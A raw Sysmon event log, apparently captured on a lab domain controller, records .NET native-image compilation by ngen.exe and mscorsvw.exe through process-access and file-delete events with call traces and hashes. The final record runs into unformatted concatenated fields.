CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64)
EventRecordID=23139; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.418; ProcessGuid={4DB9351A-A279-60D3-7C05-00000000CF01}; ProcessId=3752; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\FMPX9LRAAI\Microsoft.Windows.Diagnosis.Commands.GetDiagInput.ni.dll.aux; Hashes=MD5=0698A426646E6BC41E0726BD2E86BD7B,SHA256=D1BE629112B29F3EB80EBE354CD9AF00FB1E780165FEE08259558554B80CE35F,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=23138; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.418; ProcessGuid={4DB9351A-A279-60D3-7C05-00000000CF01}; ProcessId=3752; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\FMPX9LRAAI\Microsoft.Windows.Diagnosis.Commands.GetDiagInput.ni.dll; Hashes=MD5=5BD20FAC3B8093E0B3C7654C5FEF88F0,SHA256=9409FCB09A07163DA22934277F4873BA32B4B547018261CEB909EF8B270E6464,IMPHASH=00000000000000000000000000000000; IsExecutable=true; Archived=true
EventRecordID=23137; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.402; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=956; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A279-60D3-7C05-00000000CF01}; TargetProcessId=3752; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=23136; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.386; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=528; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A279-60D3-7C05-00000000CF01}; TargetProcessId=3752; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=23135; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.386; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A279-60D3-7C05-00000000CF01}; TargetProcessId=3752; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64)
EventRecordID=23134; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.371; ProcessGuid={4DB9351A-A279-60D3-7B05-00000000CF01}; ProcessId=6120; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\DAYYS7N999\Microsoft.Windows.DeviceHealthAttestation.Plugin.ni.dll.aux; Hashes=MD5=F75A26275DDE46A357563409477103B1,SHA256=92116001712896760DE8B8261D14CE473685F58369A395CB3C6F862784D0BFCB,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=23133; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.371; ProcessGuid={4DB9351A-A279-60D3-7B05-00000000CF01}; ProcessId=6120; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\DAYYS7N999\Microsoft.Windows.DeviceHealthAttestation.Plugin.ni.dll; Hashes=MD5=95AEB5B80B1C8AC01977ED1C89410BBE,SHA256=110CB8611BB5F58C2ABDAA9602BF318AD6051539DD56EB4F6F159664D564286C,IMPHASH=00000000000000000000000000000000; IsExecutable=true; Archived=true
EventRecordID=23132; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.355; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=956; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A279-60D3-7B05-00000000CF01}; TargetProcessId=6120; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=23131; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.339; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=528; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A279-60D3-7B05-00000000CF01}; TargetProcessId=6120; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=23130; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.339; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A279-60D3-7B05-00000000CF01}; TargetProcessId=6120; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64)
EventRecordID=23129; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.339; ProcessGuid={4DB9351A-A279-60D3-7A05-00000000CF01}; ProcessId=6536; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\BHSDQZ8WLM\Microsoft.Windows.DeploymentServices.ServerManager.Plugin.ni.dll.aux; Hashes=MD5=F0E83D5041EDF1D2E2D8223163F2FEFA,SHA256=26E00CCC69BD5E488574FF0C3FC9BF0899E0D83A960C4F29708BC4D7BBDDDAB5,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=23128; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.339; ProcessGuid={4DB9351A-A279-60D3-7A05-00000000CF01}; ProcessId=6536; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\BHSDQZ8WLM\Microsoft.Windows.DeploymentServices.ServerManager.Plugin.ni.dll; Hashes=MD5=3DEF485506E62A5CAF98FE4E69EB606F,SHA256=B4777C1887695BD6F0CD4037D77C9EEA66446B3433A7637DF00BCCDF6961611C,IMPHASH=00000000000000000000000000000000; IsExecutable=true; Archived=true
EventRecordID=23127; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.308; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=956; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A279-60D3-7A05-00000000CF01}; TargetProcessId=6536; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=23126; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.292; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=432; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A279-60D3-7A05-00000000CF01}; TargetProcessId=6536; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=23125; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.292; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A279-60D3-7A05-00000000CF01}; TargetProcessId=6536; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64)
EventRecordID=23124; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.277; ProcessGuid={4DB9351A-A279-60D3-7905-00000000CF01}; ProcessId=3252; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\UZPWIGEJ6E\Microsoft.VisualC.ni.dll.aux; Hashes=MD5=F6F6E9513E3939D0AF521B382FD70F87,SHA256=69A6468AAAF8DEA7FA96DE4C68EFC537E4068119CC493D4B0C8FB04524D27254,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=23123; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.277; ProcessGuid={4DB9351A-A279-60D3-7905-00000000CF01}; ProcessId=3252; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\UZPWIGEJ6E\Microsoft.VisualC.ni.dll; Hashes=MD5=66BC80A509F113E18FEA92CB09D17651,SHA256=1C462FCB63021DA947DF5D05C926FCF8C7493752E0CF6D9F10C1360F4BEE22E1,IMPHASH=00000000000000000000000000000000; IsExecutable=true; Archived=true
EventRecordID=23122; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.261; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=956; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A279-60D3-7905-00000000CF01}; TargetProcessId=3252; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=23121; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.261; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=528; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A279-60D3-7905-00000000CF01}; TargetProcessId=3252; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=23120; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.261; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A279-60D3-7905-00000000CF01}; TargetProcessId=3252; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64)
EventRecordID=23119; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.246; ProcessGuid={4DB9351A-A279-60D3-7805-00000000CF01}; ProcessId=2196; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\31VR3AGCMN\Microsoft.VisualBasic.Compatibility.Data.ni.dll.aux; Hashes=MD5=D7926BB9468A932E07C4BF42999AB93F,SHA256=56E2332F8C2A850BB22B465377B020CDD860B5412F890E76899719A9454DA3F6,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=23118; EventID=23 (FileDelete); UtcTime=2021-06-23 21:07:05.246; ProcessGuid={4DB9351A-A279-60D3-7805-00000000CF01}; ProcessId=2196; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\31VR3AGCMN\Microsoft.VisualBasic.Compatibility.Data.ni.dll; Hashes=MD5=B2991FBE9A529D63D641C1551ECFF5D3,SHA256=E492D771BAB42884EFF71A7F5A4BDB210F7221D75F60238C1F295FBFC2237515,IMPHASH=00000000000000000000000000000000; IsExecutable=true; Archived=true
EventRecordID=23117; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.230; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=956; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A279-60D3-7805-00000000CF01}; TargetProcessId=2196; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=23116; EventID=10 (ProcessAccess); UtcTime=2021-06-23 21:07:05.214; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=528; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A279-60D3-7805-00000000CF01}; TargetProcessId=2196; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=23115; EventID=10 (ProcessAccess); UtcTime=2021-06-23 (the remainder of this record, beginning with the time of day, follows on the next line)
21:07:05.214{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-7805-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023114Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.214{4DB9351A-A279-60D3-7705-00000000CF01}4116NT 